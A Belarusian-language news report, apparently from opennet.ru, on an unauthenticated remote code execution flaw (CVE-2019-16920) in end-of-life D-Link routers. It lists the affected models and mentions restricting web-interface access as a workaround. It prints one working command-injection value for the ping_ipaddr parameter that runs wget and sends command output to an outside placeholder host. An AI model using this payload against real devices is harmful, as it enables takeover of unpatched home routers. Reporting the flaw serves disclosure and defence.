Выдалена эксплуатаваная ўразлівасць у маршрутызатарах D-Link

У бесправадных маршрутызатарах D-Link выяўлена небяспечная ўразлівасць (CVE-2019-16920), якая дазваляе выдалена выканаць код на баку прылады праз адпраўку спецыяльнага запыту да апрацоўшчыка «ping_test», даступнаму без праходжання аўтэнтыфікацыі.

Цікава, што па задумцы распрацоўшчыкаў прашыўкі выклік "ping_test" павінен выконвацца толькі пасля аўтэнтыфікацыі, але на справе ён выклікаецца ў любым выпадку, незалежна ад уваходу ў web-інтэрфейс. У прыватнасці, пры звароце да скрыпту apply_sec.cgi з перадачай параметра "action=ping_test", скрыпт перакідае на старонку аўтэнтыфікацыі, але пры гэтым выконвае звязанае з ping_test дзеянне. Для выканання кода скарыстана яшчэ адна ўразлівасць у самім ping_test, які выклікае ўтыліту ping без належнай праверкі карэктнасці перададзенага для тэставання IP-адрасы. Напрыклад, для выкліку ўтыліты wget і перадачы на ​​знешні хост вынікаў выканання каманды "echo 1234" дастаткова пазначыць параметр "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)».

Выдалена эксплуатаваная ўразлівасць у маршрутызатарах D-Link

Наяўнасць уразлівасці афіцыйна пацверджана ў мадэлях:

  • DIR-655 з прашыўкай 3.02b05 ці старэй;
  • DIR-866L з прашыўкай 1.03b04 ці старэй;
  • DIR-1565 з прашыўкай 1.01 ці старэй;
  • DIR-652 (дадзеных аб версіях праблемных прашывак не прыводзіцца)

Час суправаджэння дадзеных мадэляў ужо скончыўся, таму кампанія D-Link заявіла, Што не будзе выпускаць для іх абнаўлення з ухіленнем уразлівасці, не рэкамендуе выкарыстоўваць і раіць замяніць на новыя прылады. У якасці абыходнага шляху абароны можна абмежаваць доступ да web-інтэрфейсу толькі для годных даверу IP-адрасоў.

Пазней высветлілася, што ўразлівасць таксама закранае мадэлі DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 і DIR-825, аб планах па выпуску абнаўленняў для якіх пакуль нічога не вядома.

Крыніца: opennet.ru

Дадаць каментар